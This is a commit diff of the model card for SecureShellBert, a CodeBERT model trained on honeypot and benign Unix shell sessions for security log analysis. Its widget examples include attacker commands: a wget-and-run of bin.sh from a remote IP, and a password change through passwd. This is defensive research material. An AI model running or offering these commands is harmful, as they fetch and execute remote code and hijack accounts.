MrBoffa commited on
Commit
ab99de4
·
verified ·
1 Parent(s): 1fc78db

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +23 -4
README.md CHANGED
@@ -1,9 +1,28 @@
1
  ---
2
  widget:
3
- - text: cat /proc/cpuinfo | cat <mask> | wc -l ;
4
  - text: echo -e pcnv81k7W9cAOnonv81k7W9cAOno | passwd | <mask> ;
5
- - text: cat /proc/cpuinfo | grep name | head -n 1 | awk {<mask> $4,$5,$6,$7,$8,$9;} ;
 
 
6
  - text: wget http://81.23.76.166/bin.sh ; chmod 777 bin.sh ; sh <mask>.sh ;
7
-
8
  pipeline_tag: fill-mask
9
- ---
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
  ---
2
  widget:
3
+ - text: cat /proc/cpuinfo | cat <mask> | wc -l ;
4
  - text: echo -e pcnv81k7W9cAOnonv81k7W9cAOno | passwd | <mask> ;
5
+ - text: >-
6
+ cat /proc/cpuinfo | grep name | head -n 1 | awk {<mask> $4,$5,$6,$7,$8,$9;}
7
+ ;
8
  - text: wget http://81.23.76.166/bin.sh ; chmod 777 bin.sh ; sh <mask>.sh ;
9
+
10
  pipeline_tag: fill-mask
11
+
12
+ metrics:
13
+ - perplexity
14
+ ---
15
+
16
+
17
+ **SecureShellBert** is a [CodeBert](https://huggingface.co/microsoft/codebert-base) model fine-tuned for **Masked Language Modelling**.
18
+
19
+ The model was domain-adapted following the [Huggingface guide](https://huggingface.co/learn/nlp-course/chapter7/3) using a corpus of **>20k Unix sessions**. Such sessions are both malign (see more at [HaaS](https://haas.nic.cz/)) and benign (see more at [NLP2Bash](https://github.com/TellinaTool/nl2bash)) sessions.
20
+
21
+ The model was trained:
22
+ - For 10 epochs
23
+ - mlm probability of 0.15
24
+ - batch size = 16
25
+ - learning rate of 1e-5
26
+ - chunk size = 256
27
+
28
+ This model was used to finetuned [LogPrecis](https://huggingface.co/SmartDataPolito/logprecis/). See more at [GitHub](https://github.com/SmartData-Polito/logprecis), and please cite [our article](https://arxiv.org/abs/2307.08309).